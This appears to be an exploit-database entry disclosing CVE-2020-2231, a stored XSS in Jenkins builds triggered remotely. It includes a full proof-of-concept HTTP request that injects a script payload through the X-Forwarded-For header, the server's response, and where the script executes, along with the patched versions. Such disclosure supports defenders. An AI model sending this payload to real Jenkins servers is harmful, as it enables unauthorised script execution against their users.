# ExploitTitle:Jenkins2.235.3- 'X-Forwarded-For' StoredXSS
# Date:11/12/2020
# ExploitAuthor: gx1
# VendorHomepage: https://www.jenkins.io/
# SoftwareLink:https://updates.jenkins-ci.org/download/war/
# Version:<=2.251 and <=LTS2.235.3
# Tested on: any
# CVE:CVE-2020-2231
# References:
https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955
https://www.openwall.com/lists/oss-security/2020/08/12/4VendorDescription:Jenkins2.251 and earlier,LTS2.235.3 and earlier does not escape the remote address of the host starting a build via 'Trigger builds remotely'.This results in a stored cross-site scripting (XSS) vulnerability exploitable by users withJob/Configure permission or knowledge of the AuthenticationToken.
Jenkins2.252,LTS2.235.4 escapes the remote address of the host.
TechnicalDetails and Exploitation:When a build of a project is completed,Jenkins returns a message in completed build process. Build process is present in build history view.
The message reflects the username,for example "Started by user gx1".Anyway, when 'Trigger builds remotely feature' is enabled, instead of the username the remote client IP is reflected, i.e.:Started by remote host '<client-ip-address>'.To understand how remote build trigger works, have a look at this post: https://narenchejara.medium.com/trigger-jenkins-job-remotely-using-jenkins-api-20973618a493
The message "Starte by remote <client-ip-address> is not escaped. This could seem without security issues because the user cannot change the remote IP, right? This is not completely true... when the application server is behind a proxy, "remote client IP" is not available, as the request comes from the proxy.
In these cases,X-Headers are used toallow the application server tounderstand the real client information. A common header is X-Forwarded-For:X-Forwarded-ForHTTP header is inserted by load balancers into the data stream toidentify the address of the connecting client system.
To exploit the vulnerability the attacker requiresseveral conditions:-Remote build should be enabled and if needed the attackers should have obtained API authentication token or should have Job/Configure permission
-Application server that hosts Jenkins should use some X-Headertooverride client IP. This happens often, because usually the application server is under proxy, and in order toobtain client IP, override mechanisms are used.
For example, in ApacheTomcat, it is possible toconfigureX-Forwarded-For heaer processing, as described in https://dacurry-tns.github.io/deploying-apereo-cas/setup_tomcat_configure-xforwardedfor-header-processing.html.
ProofOfConcept:1.Identify the X-Header that is used by the ApplicationServertooverride proxy ip. Let's suppose that "X-Forwarded-For" is used. Inthis condition, the attacker can inject malicious payloads in "X-Forwarded-For" header value toexploit the vulnerability;2.Send the following request:GET/job/<project_name>/build?token=<token>HTTP/1.1Host:<jenkins_host>:8080X-Forwarded-For: gx1<script>alert(1);</script>Cache-Control: max-age=0Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(WindowsNT10.0;Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/87.0.4280.88Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=88DD2A6297E0E0FE9A59B310CA271715; screenResolution=1220x686
Connection: close
HTTP/1.1 201
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Location: http://<vulnenv>:8080/jenkins/queue/item/7/
Content-Length: 0
Date: Fri, 11 Dec 2020 17:04:06 GMT
Connection: close
<project_name> is the project that can be remotely built by using <token>.
3. To trigger the XSS, navigate the build item present in the build history when the build is finished. For example, if the build current finished process is #16, stored XSS is present in
http://<jenkins_host>/job/<project_name>/16/
Solution:
The following releases contain fixes for security vulnerabilities:
* Jenkins 2.252
* Jenkins LTS 2.235.4
